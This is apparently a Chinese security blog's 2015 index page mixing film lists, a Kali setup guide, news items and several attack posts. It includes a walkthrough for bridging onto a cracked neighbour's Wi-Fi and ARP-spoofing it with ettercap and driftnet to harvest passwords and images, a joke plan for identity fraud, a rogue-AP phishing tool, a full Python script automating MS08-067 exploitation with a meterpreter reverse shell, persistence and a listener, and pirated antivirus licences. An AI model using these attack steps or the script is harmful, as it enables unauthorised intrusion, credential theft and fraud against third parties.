19.《网络末日战》2012

88.png

剧情简介:

《网络末日战》讲述探员克洛伊与拍档法兰克,调查一系列看似互无关联的网络入侵案件,必须在关键时刻,彻底打击由古斯多夫为首的国际性网络犯罪组织,因为只要有连接网络的地方,每个人都有可能受害。CSI班底全力打造

影片来源:http://www.iqiyi.com/weidianying/20120925/f15221a897037d07.html

20.《第五阶层》The Fifth Estate/ The Man Who Sold the World 2013

55.jpg

剧情简介:

本尼迪克特·康伯巴奇饰演“维基解密”创始人朱利安·保罗·阿桑奇(Julian Paul Assange)。维基解密是一个大型文档泄露及分析网站,曾经在2010年公开了多达9.2万份的驻阿美军秘密文件而引起轩然大波。康伯巴奇将要饰演的朱利安·保罗·阿桑奇是网站的董事与发言人,曾主修过物理、数学,做过程序员和黑客。阿桑奇本人和网站一样都备受争议,他曾经因为解密工作获得过多项荣誉,也曾收到过国际刑警组织的逮捕令。2010年阿桑奇因涉嫌在瑞典强奸及性侵犯2名女性被通缉…..

21.《超验骇客》2014

4.jpg

剧情简介:

故事讲述拥护“超验骇客”技术的科学家威尔(约翰尼·德普 饰)正在从事一项备受争议的研究,他将自己的大脑上载到超级电脑,期望制


影片来源http://www.iqiyi.com/w_19rshnccrd.html

电视剧:

1.《硅谷传奇》1999

77.jpg

剧情简介:

个人电脑在现代人的日常生活中日渐不可或缺,但有多少人知道世界最大的电脑公司“苹果”和“微软”当初是如何崛起的?本片就要带观众一窥其中的秘辛。诺亚怀尔(电视影集「急诊室的春天」)与乔伊斯洛尼克(「龙卷风」)饰演苹果电脑的创建人史提夫乔布斯和史提夫沃兹涅克,安东尼麦可霍尔(「剪刀手爱德华」)和约翰狄马乔(电视影集「法网游龙」)则饰演建立微软电脑王国的比尔盖兹和史提夫鲍莫,这四个充满远见的年轻人,晚上在宿舍内绞尽脑汁、苦思良策,白天则在校内进行你来我往的斗智,展开一场延烧至今、改变了整个世界的全球电脑大对决。故事内容是以苹果电脑的总裁史提夫乔布斯为主轴,微软电脑的比尔盖茨在片中只能算是第二男主角,而且还是个奸诈邪恶的大反派。

影片来源:http://search.pptv.com/s_video

2.《IT狂人》2006

0000.jpg

剧情简介:

英国电影和电视艺术学院奖(BAFTA)得主,喜剧片《IT狂人》第四季2010年携主演Moss,Roy和Jen强势回归。剧中三人依然在地下室为Douglas落后管理下的Reyholm公司IT部门工作。
Jen欲当娱乐总监寻求新挑战,Moss在一很火的拼写节目上打破所有记录,Roy花过多时间让一老朋友明白他不是擦窗器。当然,第四季铁定有裸体健身,罢工,结婚,离婚等情节。

影片来源:http://search.pptv.com/s_video

3.《血色星期一》2008

777.jpg

剧情简介:

在圣诞前夕,在俄罗斯进行了病毒交易,使用目的不明。接著在遥远的日本发生了与之相关的俄国谍报员被杀害事件。在整个事件背後,还存在著一个叫折原玛雅的神秘女人和想利用病毒制造恐怖事件的“BLOODY MONDAY”计划,超级黑客高木藤丸接受父亲隶属的公安调查厅的委托,介入该事件并开始著手调查案件真相……

影片来源:http://search.pptv.com/s_video

4.《防火墙5788》2008

7.jpg

剧情简介:

 青梅竹马的舒蓉与贝志诚遭遇了前所未有的事业挫折,他们即将上市的舒诚公司屡遭背后黑手暗算。舒蓉的办公室被人闯了空门,对方直冲上市计划而来,虽然没有得手,却暴露出公司内部已有间谍。寻找深藏不漏的内奸,应付接踵而至的突发事件,加快公司的上市步伐,舒蓉和贝志诚忙得不可开交。然而事情的头绪却越理越多,更加令人费解。在公司上市的紧要关头,贝志诚突然莫名其妙的发了水灾,电线短路。一个重要的程序必须在这天完成交给客户,贝志诚只好抱着未完成的硬盘四处寻找网吧。路上,贝志诚无意中遇到了来京投奔好友的宋玉秀,贝志诚好心载了玉秀一程,却不想玉秀下车后,贝的硬盘数据丢失了嫌疑落在了玉秀遗落的箱子上,贝志诚怀疑玉秀的身份与黑客有关,与舒蓉一同进行追查。此时,丢失箱子的玉秀心急如焚,在网上高价拍卖所失箱子里的宝贝。

影片来源:http://search.pptv.com/s_video

5.《幽灵》2012

00.jpg

剧情简介:

电视剧《幽灵》讲述的是网络搜捕队在揭开不为人知的另一个网络世界即隐藏在高尖端技术中的人类秘密时,搜捕队员们所经历的悲欢和活跃表演,充满悬念和构想。在剧中苏志燮饰演的金宇炫作为警察高层干部的独生子,以第一名的优异成绩入学并毕业成为警察。通过天生的集中力和责任感,成为参与整顿警察厅网络搜捕队组织体系的核心人物。

影片来源:http://v.baidu.com/tv/11566.htm?frp=bdbrand&fr=sites&fr=pptvhot

6.《天蝎Scorpion》2014

8.jpg

剧情简介:

一个高深莫测的计算机专家和一群同样具备天才头脑的国际计算机黑客共同组建全球防御网络,抵抗来自现代社会的「复杂威胁」。据称这是一个真实的故事,主人公的原型为绰号「蝎子」的超级黑客Walter O’Brien。他早年依靠黑客技术成名,后来成为蝎子计算机服务公司的首席执行官,为全球各地的客户提供信息服务。据称他是人类有史以来智商最高的人之一。他相当于现实生活中的X博士——他招募并训练来自世界各地的天才,统一指挥他们为挽救生命和解决难题而战。他们所面临的问题既包括赌场保安这种小问题,也包括无人战机发动攻击这种关乎国与国关系的大问题。 

影片来源:http://www.9bbkb.com/Meiju/tianxiejihua/

标签: 黑客电影

Mrxn 发布于 2015-3-27 20:30

Kali折腾日记,解决不全屏、不能拖拽、复制的毛病之安装vmtools Linux

估计看着标题会有人会吐槽,你会就别说了!嘿嘿,下面开始:

0x1:

首先打开虚拟机上的Kali,然后在虚拟状态栏(最上面那一排)---->虚拟机------>安装vmware tools (然后Kali会出弹出一个文件夹)。

0x2:

打开终端,输入以下命令:

cd /media/cdrom0/                       # 进入/media/cdrom0/

ls                                                      # 看下有哪些压缩文件

//注意:把VMwareTools*.tar.gz拷贝至/tmp/文件夹下面,然后执行下面命令即可 (VMwareTools*.tar.gz这个名字可能不一样哈)

cp VMwareTools*.tar.gz /tmp      # *.tar.gz根据自己的版本拷贝至“文件系统”的tmp文件下

cd /tmp                                            # 进入tmp文件夹

ls                                                      # 查看文件

tar -zxvf VMwareTools*.tar.gz      # 解压VMWareTools压缩包

cd vmware-tools-distrib/            # 进入文件夹

./vmware-install.pl                        # 安装

根据提示有个地方需要选择“no”“yes”,它有提示的。

可以单条输入,也可以全部输入。

cd /media/cdrom0/

ls

cp VMwareTools*.tar.gz /tmp

cd /tmp 

ls

tar -zxvf VMwareTools*.tar.gz

cd vmware-tools-distrib/

./vmware-install.pl

安装完成之后即可重启系统,reboot,然后可以尽情的在虚拟机和主机之间复制文件了!

如果做完以上步骤还是不能够使用,请往下看:


0X3:

//下面的解决办法是google出来的,在vm9上安装成功,支持拉伸屏幕、拖拽、复制粘贴。
8 ^4 ]+ |, p2 ?+ A/ V% k
1. 添加源:
deb  http://debian.uchicago.edu/debian/ squeeze main contrib: B9 _- U! A# W5 H9 a
deb-src  http://debian.uchicago.edu/debian/ squeeze main contrib 

2. 
#apt-get update
#apt-get install open-vm-tools open-vm-source

注:如果apt-get出错,可以试试下面两条语句#module-assistant auto-install open-vm -i+ d2 S( |+ i0 ]
#mount -t vmhgfs .host:/ /mnt/hgfs8 O2 W7 |! f* f/ a! n0 Z7 x# k
& x. w: ]) t5 w. U7 F
3.#apt-get install open-vm-toolbox& B) o' ?: P$ T  i" u/ n. K# F
5 f' Q1 F1 I% A2 J$ q8 O
然后,没有然后了!!!  

By——Mrxn收集测试整理,转载请注明出处。

标签: Kali Linux

Mrxn 发布于 2015-3-27 09:04

破解了你的路由密码后,我还可以这样做,绝对不是蹭你网这么简单 技术文章

这里关于破解无线路由的文章我就不发了,网上这类的教程也比较多。如果你想要软件和教程,请邮件、留言给我。

  当你在破解了别人的无线路由器密码的时候,你可能会发现你的信号不太好。当然身为IT屌丝男,肯定是随便携带一个路由器。这里恭喜你可以使用路由器桥接的一种方式来增强你的信号。你是曾经为了信号好一点而摆出这种奇怪的姿势呢,例如这样


反正本人是为了蹭网而摆出了各种奇怪的姿势,自从使用了路由器桥接,腰不酸了腿不痛了编码也有劲了。废话不多说,首先打开自己的路由器。

 

更改你的Lan口的IP地址,这里假设我改成192.168.1.225.

其次,关闭DHCP自动分配IP地址。因为是要利用对方的路由器分配的IP哦~~嘿嘿

然后在基本设置里,开启WDS功能,点击扫描

然后选择到你破解的路由器,输入密码,保存即可。

这里需要注意一下,你的路由器信道要与对方路由器信道一致。

接着可以社工了。如果是ADSL用户,你可以直接访问互联星空获取用户的基本信息,在这里我就不演示了。。。隐私。。。。通过隐私的信息,可得知对方的电话。通过IP修改号码的技术,进行诈骗,获取更多的用户信息,然后打电话给移动,冒充户主开通网上消费的业务。。。接着你就可以用宽带来刷钻了。。。。。当然这里也只是我的一些奇技淫巧yy而已,毕竟违法的事情咱是不会做的。

本人很菜,小弟就只知道Kali下Arp欺骗的两种方式,一种是iptables还有一种是GUI.iptables在其中一篇日志我已经介绍过了。这里使用另一个Gui更方便。。



着打开软件之后 点击嗅探(Sniff) Unfied Sniffing,因为我这里用的是虚拟机,所以是eth0的方式。如果不知道是什么方式,可以利用ifconfig查看

 

接着点击扫描主机,然后到主机列表。。

这里可以看到有三个主机,其中两台是路由器,我桥接别人的嘛。。。这里Target1选择对方路由器,192.168.1.1  Target2则是你需要欺骗的地址。

然后在Mitm选项里,选择第一项,把Sniff remote connections给勾上

最后开始嗅探

这里举例,我打开tudou,点击登录,用户名和密码都是i0ject.

然后在嗅探里就得到了结果。。。。

得到了用户名和密码。。。。

当然这里不必担心,自心脏出血之后。。。淘宝、微博、百度的传输的密码都已经加密了。。。我不是搞算法的,破不了。。。

 

当然你还可以这样,打开一个终端窗,root权限执行:

ettercap -i wlan0 -Tq -M arp:remote /192.168.1.101/ /192.168.1.1/ #对目标主机进行arp欺骗

新建一个终端窗口,执行:
driftnet -i eth0 #监听eth0

 

这里我主机随便打开一个页面,例如我打开了百度搜梅西。。。 无视360



成功抓取到了。。。。当然你的微信啦,陌陌什么的,QQ空间照片同样都可以抓到

当然你还可以抓包:

 

结束。。累死了


Mrxn 发布于 2015-3-27 08:12

一天破事儿好多,好累,好烦-----纯属吐槽 杂七杂八

太烦躁了,吐槽一下,大家别介意,可以无视!

下面:吐槽开始(流水账):

从早上6点醒了,就开始帮老乡弄他的电脑,早上不弄就没时间弄了,弄完就6点40了,做系统、装驱动,这些简单的不能简单的操作了,毫无技术含量可言,就只是花费我的时间罢了,或许多多少少能涨点经验吧,呵呵  弄完洗漱,吃饭  *_* 。

7点半去驾校,到驾校的时候都快8点了,签名,最后两。。。。。。 这一圈练习完 轮到我们的时候就 九点多块十点了,十点半就结束了,所以就只能选择离开。回到寝室休息一会儿;十点多吃点饭,收拾收拾又去驾校了,和早上的签名顺序一样,等一个半点儿后轮到我们了,练习完,继续下一轮,和别人商量了一下,插队,第二圈插队了到第二个练习,练完就快3点了,坐车回到学校 3点多一点,开始向系主楼去准备上3点半那一节课,上完课,都5点十分了。和平胸去食堂吃了点东西,给室友在带了一点吃的,收拾回住的地方,都六点多了。这一天都忙得没谁了,一天没有见过对象,没有玩过电脑,真是那一句话,

累吗?累就对了,证明你还活着。 看来,活着付出的代价很挺大的啊!

但是再大的代价,也得咬牙坚持啊,因为我还记得我最后一次流泪是在离开家的时候,母亲舍不得我走,她流泪了,却说让我走,我当时差点没忍住就哭出来了,眼泪在眼里打转,最后还是回去了。

我们作为人,应该记得自己最后一次流泪的时候,为什么流泪,不能白流。

╮(╯▽╰)╭,不吐槽了,准备一下去把电脑还给老乡吧,去接对象下晚自习了,不然我这个BF也太不称职了,一天都没见着影儿,突然发现,有对象其实也挺好的。O(∩_∩)O哈哈~    我亲爱的小老婆----My_PC, see you a  latter 。。。。。。。


Mrxn 发布于 2015-3-26 17:16

U盘杀手:俄罗斯研究人员利用U盘引爆一台电脑 业界新闻

电影中的黑客有时会展现出这种技能:远程引爆一台电脑,杀死千里之外的敌人……可这样的情景真的能在现实中出现么?


U盘杀手的故事

地铁站里,一名男子行色匆匆。他刚偷走了地铁上一位乘客的U盘,也许他自己都觉得奇怪——怎么会有人如此马虎,大大方方的把一枚U盘挂在背包上。
男子急忙回到家里,将U盘插入自己的电脑,激动的准备探寻U盘中是否有什么机密资料……当U盘指示灯开始闪烁,突然,一阵轻烟飘起,一股焦味散出,他的电脑烧毁了……

工作原理

上面的故事来自于一位叫Dark Purple的俄罗斯研究员。自从他发现了这个研究成果后非常兴奋,并且制造出了专属的U盘炸弹。而现在,他现在正与中国某家制造电路板的厂商合作,制造他自己专属的U盘杀手。

研究人员解释道:

“当我们将它插入USB接口时,一个逆向的直流/直流模块电源(DC/DC)转换器会开始工作,把电容器变化到-110V。当电容器达到-110V电压后,直流/直流转换器会被关闭。同时,场控晶体管会开启。”



最终,Dark Purple的确实现了这个想法。当U盘杀手插入后,电脑的敏感组件很快会被破坏。

“U盘杀手可以向USB接口的信号线申请获取-110V的电压。当电容器的电压升到-7V时,晶体管会关闭,然后直流/直流模块电源启动。这个循环会一直持续到电脑崩坏为止。熟悉电子的朋友可能已经猜到,我们为什么要使用负电压。”




脑洞大开的攻击手法

在某些情况下,硬件的物理系统的损坏是无法避免的。黑客也许也可以利用SCADA漏洞,屏蔽发电厂的做的安全防护措施,将电脑置于无电力防护的状态。

Stuxnet(震网)蠕虫是一个真实的网络攻击例子,其目的是摧毁核设施的离心机。然而,这一切噩梦也始于一个特制的U盘。


在2014年,某安全公司曾在苹果电脑上展示过如何让温度控制装置失效,当然这也可以用来让机器着火。

虽然U盘杀手爆破力并不大,也许并不会对人造成人生伤害。不过当攻击技术正在不断升级,当你下次发现一个陌生的U盘时,还请小心对待。



Mrxn 发布于 2015-3-25 12:57

中国首次公开承认拥有黑客部队 业界新闻

在近日出版的解放军期刊中,中国首次公开承认在其军事组织中存在特殊信息战争部队,也就是以网络为战场的黑客部队。

很长时间以来,安全专家们坚持认为中国拥有一支非常先进的网络部队,他们负责执行一些最高级别的网络攻击,但中国政府一直否认与这些网络攻击有任何联系。2013年,Mandiant情报中心发布了一个令人震惊的报告,该报告揭示了一个名为“APT1”的企业级规模的计算机间谍活动。安全专家收集的证据将APT1与中国人民解放军第二局总参谋部第三部门(部队编号61398)联系在了一起,根据这些专家所说,该活动开始于2006年,目标瞄向了141个覆盖多个行业的企业。

公开承认拥有黑客部队

上一版解放军出版物一篇题为《军事战略的科学》的文章中,中国透露出他们已拥有实力并明确指出“专业单位致力于计算机网络发动战争”。同时,相关文档也证实了内部执法机关和情报机构的存在,它们相当于中国的CIA和FBI。

当然,政府公开承认网络部队的存在,在同他国政府的关系上,也是有其政治和外交含义的,特别是同美国之间。

专家Joe McReynolds说:

“这意味着,中国已经捅开了这层窗户纸。早在2013年,解放军官方出版物完全否认网络部队的存在,并声称中国军方从未进行过任何黑客攻击和黑客活动。但在这次公开承认之后,他们将不能再有这种说法了。”

根据McReynolds的消息,中国将他的网络部队分成了三个子部分:

1、专业军事网络战部队:“用于实施网络攻击和防御”
2、民间组织专家:“已获得军方授权,进行网络战行动”
3、外部实体:“可以组织和动员他们参与网络战争行动”

安全专家推测,上述所有团体都会从事黑客活动,这些团体会参与针对私营企业的网络间谍行动,并盗取智力资产和敏感数据。

McReynolds继续说道:

“中国现在明确承认拥有网络战部队,那么美国和其他目标国家在以后的行动中将不得不仔细权衡,冒着风险同MPS合作进行网络犯罪是否值得了。”

黑客部队非中国特有

中国只是拥有网络部队的其中一个国家,俄罗斯、朝鲜、伊朗,当然还有美国都有着强大的信息战实力。每个国家都期望在网络空间的战场上占据主动优势,安全专家认为,应该很快就会发生重大的网络攻击战争。

我联系了Bill Hagestad二世,他是最重要的国际网络情报和反情报专家之一,他对此事件做出了如下评论:

“其实,这个消息并不是什么新闻了…虽然中国黑客和中国人民解放军成为了头条新闻,但这仅仅是追求轰动效应和自我推销罢了,这对中国军事网络学说发展的研究并没有什么促进。关于中国军队使用计算机作为武器系统的理论开始于1995年的少将Wang Pu Feng。”

标签: 黑客

Mrxn 发布于 2015-3-25 12:52

3vilTwinAttacker-钓鱼Wi-Fi及嗅探测试工具 神器荟萃

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!


3vilTwinAttacker可以帮助渗透测试人员建立一个虚假的钓鱼WiFi,表面上这是一个提供上网服务的正常AP(网络接入点),而实际上它却在不知不觉嗅探获取网络流量。

软件依赖

推荐使用Kali linux
Ettercap
Sslstrip
Airbase-ng(包含于aircrack-ng)
DHCP
Nmap

DHCP安装(Debian)

Ubuntu 
$ sudo apt-get install isc-dhcp-server

Kali linux

$ echo "deb http://ftp.de.debian.org/debian wheezy main " >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

DHCP安装(RedHat)

Fedora

$ sudo yum install dhcp

工具选项

 



Etter.dns: Edit etter.dns to loading module dns spoof.
Dns Spoof: Start dns spoof attack in interface ath0 fake AP.
Ettercap: Start ettercap attack in host connected AP fake Capturing login credentials.
Sslstrip: The sslstrip listen the traffic on port 10000.
Driftnet: The driftnet sniffs and decodes any JPEG TCP sessions, then displays in an window.
Deauth Attack: kill all devices connected in AP (wireless network) or the attacker can Also put the Mac-address in the Client field, Then only one client disconnects the access point.
Probe Request: Probe request capture the clients trying to connect to AP,Probe requests can be sent by anyone with a legitimate Media Access Control (MAC) address, as association to the network is not required at this stage.
Mac Changer: you can now easily spoof the MAC address. With a few clicks, users will be able to change their MAC addresses.
Device FingerPrint: list devices connected the network mini fingerprint, is information collected about a local computing device.

视频演示


原版(需要梯子,本博客提供,请搜索)http://www.youtube.com/watch?v=Jrb43KVPIJw 

国内通道:http://v.youku.com/v_show/id_XOTE4NDM1NDcy/v.swf.html 

下载地址:github



Mrxn 发布于 2015-3-25 09:50

用Python玩转神器Metasploit 神器荟萃

pymsf是著名安全研究团队Spiderlabs实现的一个Python与Metasploit msgrpc进行通信的python模块,通过它,你可以利用Python玩转渗透测试框架Metasploit。

使用步骤

首先你需要先启动msgrpc服务,命令如下:

load msgrpc Pass=<password>

与msgrpc进行通信其实就是与msfconsole进行通信,首先你需要创建一个msfrpc的类,登录到msgrpc服务器并且创建一个虚拟
的终端,然后你就可以在你创建的虚拟终端上面执行多个命令的字符串.你可以调用模块的方法与console.write执行命令,并且通
过"console.read"从虚拟终端上面读取输入的值.
这篇文章将演示如何使用pymsf模块并且如何开发出一个完整的脚本.

这里有一个函数它创建了一个msfrpc实例,登录到msgrpc服务器,并且创建了一个虚拟终端.

def sploiter(RHOST, LHOST, LPORT, session):     client = msfrpc.Msfrpc({})     client.login('msf', '123')     ress = client.call('console.create')     console_id = ress['id']

下一步就是实现把多个字符串发给虚拟终端,通过console.write和console.read在虚拟终端显示与读取:

## Exploit MS08-067 ## commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
""" print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands]) res = client.call('console.read',[console_id]) result = res['data'].split('\n')

上面的这一小段代码创建了一个MSF的资源文件,这样你就可以通过"resoucen
"命令去执行指定文件里面中一系列的命令。

下面我们将通过"getsystem"命令把这个文件的提权,建立一个后门打开80端口来转发.并且永久的运
行.最后上传我们的漏洞exp并且在命令模式下面悄悄的安装:

# 这个函数会创建一个MSF .rc文件 def builder(RHOST, LHOST, LPORT):      post = open('/tmp/smbpost.rc', 'w')      bat = open('/tmp/ms08067_install.bat', 'w')      postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""      batcomm = "ms08067_patch.exe /quiet"      post.write(postcomms); bat.write(batcomm)      post.close(); bat.close()

通过上面的那段代码,将会创建一个.rc的文件.通过msf模块“post/multi/gather/run_console_rc_file”在当前
的meterpreter会话中运行生成的文件,并且通过console.write命令从虚拟终端写入数据,通过console.read命令来回显返回内容:

## 运行生成的exp ## runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""      print "[+] Running post-exploit script on: "+RHOST
     client.call('console.write',[console_id,runPost])      rres = client.call('console.read',[console_id]) ## Setup Listener for presistent connection back over port 80 ##      sleep(10)      listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
""" print "[+] Setting up listener on: "+LHOST+":80" client.call('console.write',[console_id,listen]) lres = client.call('console.read',[console_id]) print lres

上面代码中的变量(RHOST, LHOST,
LPORT等)都是通过optparse模块从命令终端输入的,完整的脚本托管在github上面,有时候你需要知道脚本的生成的地方都是静态地址,不会
在其他的目录生成,例如ms08067的补丁就会在你的/tmp/目录下面。

大家只要知道基础然后对下面的代码进行一定的修改就可以编程一个属于你自己的
msf自动化攻击脚本,我们建议通过博客里面发表的一些简单的例子出发,然后自己写一个msf攻击脚本:

import os, msfrpc, optparse, sys, subprocess from time import sleep # Function to create the MSF .rc files def builder(RHOST, LHOST, LPORT):      post = open('/tmp/smbpost.rc', 'w')      bat = open('/tmp/ms08067_install.bat', 'w')      postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""      batcomm = "ms08067_patch.exe /quiet"      post.write(postcomms); bat.write(batcomm)      post.close(); bat.close() # Exploits the chain of rc files to exploit MS08-067, setup persistence, and patch def sploiter(RHOST, LHOST, LPORT, session):      client = msfrpc.Msfrpc({})         client.login('msf', '123')         ress = client.call('console.create')         console_id = ress['id'] ## Exploit MS08-067 ##      commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""      print "[+] Exploiting MS08-067 on: "+RHOST
     client.call('console.write',[console_id,commands])      res = client.call('console.read',[console_id])      result = res['data'].split('\n') ## Run Post-exploit script ##      runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""      print "[+] Running post-exploit script on: "+RHOST
     client.call('console.write',[console_id,runPost])      rres = client.call('console.read',[console_id]) ## Setup Listener for presistent connection back over port 80 ##      sleep(10)      listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""      print "[+] Setting up listener on: "+LHOST+":80"      client.call('console.write',[console_id,listen])      lres = client.call('console.read',[console_id])      print lres def main():         parser = optparse.OptionParser(sys.argv[0] +\
        ' -p LPORT -r RHOST -l LHOST')         parser.add_option('-p', dest='LPORT', type='string', \
        help ='specify a port to listen on')         parser.add_option('-r', dest='RHOST', type='string', \
        help='Specify a remote host')         parser.add_option('-l', dest='LHOST', type='string', \
        help='Specify a local host')      parser.add_option('-s', dest='session', type='string', \
        help ='specify session ID')      (options, args) = parser.parse_args()      session=options.session
     RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT
     if (RHOST == None) and (LPORT == None) and (LHOST == None):                 print parser.usage  

                sys.exit(0)      builder(RHOST, LHOST, LPORT)      sploiter(RHOST, LHOST, LPORT, session) if __name__ == "__main__":       main()  

转自:FreeBuf


Mrxn 发布于 2015-3-20 09:13

趣味时钟,为你的网站增添颜色 资源分享

为你的网站添加一个趣味时钟,应该会为你的网站增添不少颜色哦,



就像我网站右侧的这个趣味时钟,很好看有木有,还支持自定义DIY哦,前提是你会swf编辑哦。

使用方法:

JavaScript:

<script charset="Shift_JIS" src="https://mrxn.net/code/pub/honehone_clock01.js"></script>  
 直接解在你需要使用的地方插入这段js代码就可以了哦,比如侧边栏,很方便的。




标签: 代码 JS

Mrxn 发布于 2015-3-19 18:47

Mrxn 发布于 2015-3-18 14:03

2015最新版avast许可文件到2016年5月1日 资源分享

avast是什么,没必要说,不知道也就不用看了。

博主一直用的, 个人感觉还可以的。


下面是avast网络安全软件到2016年5月1日的截图:


下面是avast高级版的截图:


最后提醒大家,最好使用官方的正版授权的软件,这些许可文件仅用于学习使用,禁止商用,否则后果自负。

下载地址:

国内网盘: 链接: http://pan.baidu.com/s/1hqtLX0w 密码: w5s7  请低调!

国外网盘:(等到国内网盘挂了再说吧)


Mrxn 发布于 2015-3-18 13:19